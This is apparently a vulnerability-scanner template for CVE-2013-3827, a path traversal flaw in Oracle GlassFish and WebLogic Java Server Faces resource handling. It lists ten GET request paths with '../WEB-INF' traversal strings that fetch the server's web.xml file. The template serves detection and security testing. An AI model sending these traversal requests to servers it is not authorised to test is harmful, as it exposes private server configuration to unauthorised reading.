id: CVE-2013-3827 info: name: Javafaces LFI author: Random-Robbie severity: medium description: An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container. tags: cve,cve2013,lfi,javafaces,oracle reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-3827 - https://www.exploit-db.com/exploits/38802 - https://www.oracle.com/security-alerts/cpuoct2013.html classification: cve-id: CVE-2013-3827 requests: - method: GET path: - "{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF" - "{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." - "{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF" - "{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." - "{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF" - "{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." - "{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF" - "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF" - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." stop-at-first-match: true matchers-condition: and matchers: - type: word words: - "" part: body condition: and - type: status status: - 200 # Enhanced by mp on 2022/02/23